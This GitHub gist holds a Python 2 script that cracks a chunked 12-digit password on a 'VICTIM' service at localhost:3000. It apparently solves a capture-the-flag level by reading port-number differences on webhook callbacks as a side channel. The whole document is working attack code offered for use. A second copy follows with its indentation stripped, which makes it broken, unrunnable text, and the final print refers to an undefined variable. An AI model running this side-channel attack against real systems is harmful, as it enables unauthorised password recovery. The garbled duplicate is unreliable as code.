micahflee/gist:3474044

## gistfile1.txt
#!/usr/bin/env python

import socket
import json
import urllib2
import sys

HOST = '' # Symbolic name meaning all available interfaces
PORT = 50132 # Arbitrary non-privileged port
VICTIM = 'http://localhost:3000'

old_port = 1 #the last port that we were connected to from
current_diff = 2 #the current level of port difference we should be experiencing
current_errors = 0 #counter of how many times the port difference has been one less than it should currently be, indicating a possible false positive
error_limit  = 4 #the number of off by one errors we can receive before we assume false positive and return to cracking the previous portion of the password

guesses = [0, 0, 0, 0]
current_guess = 0 #the current section that we are on

def build_password():
  password = ""
  for i in range(4):
    if guesses[i] < 10:
      password += "00"
    elif guesses[i] < 100:
      password += "0"
    password += str(guesses[i])
  return password

def guess():
  password = build_password()
  print 'guessing', password
  req = urllib2.Request(VICTIM, '{"password": "'+password+'", "webhooks": ["localhost:'+str(PORT)+'"]}')
  res = urllib2.urlopen(req)
  res.read()

def increment_guess():
  guesses[current_guess] += 1
  if guesses[current_guess] == 1000:
    print 'something went wrong'
    sys.exit()

if __name__ == '__main__':
  # listen for webhooks
  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  s.bind((HOST, PORT))
  s.listen(1)

  while 1:
    guess()

    # wait for connection
    conn, addr = s.accept()
    print 'connected by', addr,
    new_port = addr[1]
    diff = new_port - old_port
    print "port diff", str(diff),


    old_port = new_port
    old_diff = diff

    #check if we have incremented prematurely and received a false positive
    if diff == current_diff - 1:
      current_errors += 1
      if current_errors == error_limit:
        print "hit error limit, reducing current diff"
        current_diff -= 1
        guesses[current_guess] = 0
        current_guess -= 1
        current_errors = 0
        print "current_diff is now", current_diff
        print "current_guess is now", current_guess


    if diff == 2: # failed on 1st try
      if current_guess == 0:
        increment_guess()
    elif diff == 3: # failed on 2nd try
      if current_guess == 1:
        increment_guess()
    elif diff == 4: # failed on 3rd try
      if current_guess == 2:
        increment_guess()
    elif diff == 5: # failed on 4th try, or success
      if current_guess == 3:
        increment_guess()
    else:
      #if we have not gotten a proper port difference try again
      continue

    #move on to the next octet if the port difference has increased by 1
    if current_diff + 1 == diff:
      current_guess += 1
      current_diff += 1
      print 'current_guess is', current_guess
      print 'current_diff is', current_diff

    data = conn.recv(1024)
    if data:
      body = data.split('\r\n\r\n')
      if len(body) > 1:
        result = json.loads(body[1])
        if result['success']:
          print 'SUCCESS:', password
          sys.exit()
      else:
        print body
    conn.close()
	#!/usr/bin/env python

	import socket
	import json
	import urllib2
	import sys

	HOST = '' # Symbolic name meaning all available interfaces
	PORT = 50132 # Arbitrary non-privileged port
	VICTIM = 'http://localhost:3000'

	old_port = 1 #the last port that we were connected to from
	current_diff = 2 #the current level of port difference we should be experiencing
	current_errors = 0 #counter of how many times the port difference has been one less than it should currently be, indicating a possible false positive
	error_limit = 4 #the number of off by one errors we can receive before we assume false positive and return to cracking the previous portion of the password

	guesses = [0, 0, 0, 0]
	current_guess = 0 #the current section that we are on

	def build_password():
	password = ""
	for i in range(4):
	if guesses[i] < 10:
	password += "00"
	elif guesses[i] < 100:
	password += "0"
	password += str(guesses[i])
	return password

	def guess():
	password = build_password()
	print 'guessing', password
	req = urllib2.Request(VICTIM, '{"password": "'+password+'", "webhooks": ["localhost:'+str(PORT)+'"]}')
	res = urllib2.urlopen(req)
	res.read()

	def increment_guess():
	guesses[current_guess] += 1
	if guesses[current_guess] == 1000:
	print 'something went wrong'
	sys.exit()

	if __name__ == '__main__':
	# listen for webhooks
	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.bind((HOST, PORT))
	s.listen(1)

	while 1:
	guess()

	# wait for connection
	conn, addr = s.accept()
	print 'connected by', addr,
	new_port = addr[1]
	diff = new_port - old_port
	print "port diff", str(diff),


	old_port = new_port
	old_diff = diff

	#check if we have incremented prematurely and received a false positive
	if diff == current_diff - 1:
	current_errors += 1
	if current_errors == error_limit:
	print "hit error limit, reducing current diff"
	current_diff -= 1
	guesses[current_guess] = 0
	current_guess -= 1
	current_errors = 0
	print "current_diff is now", current_diff
	print "current_guess is now", current_guess


	if diff == 2: # failed on 1st try
	if current_guess == 0:
	increment_guess()
	elif diff == 3: # failed on 2nd try
	if current_guess == 1:
	increment_guess()
	elif diff == 4: # failed on 3rd try
	if current_guess == 2:
	increment_guess()
	elif diff == 5: # failed on 4th try, or success
	if current_guess == 3:
	increment_guess()
	else:
	#if we have not gotten a proper port difference try again
	continue

	#move on to the next octet if the port difference has increased by 1
	if current_diff + 1 == diff:
	current_guess += 1
	current_diff += 1
	print 'current_guess is', current_guess
	print 'current_diff is', current_diff

	data = conn.recv(1024)
	if data:
	body = data.split('\r\n\r\n')
	if len(body) > 1:
	result = json.loads(body[1])
	if result['success']:
	print 'SUCCESS:', password
	sys.exit()
	else:
	print body
	conn.close()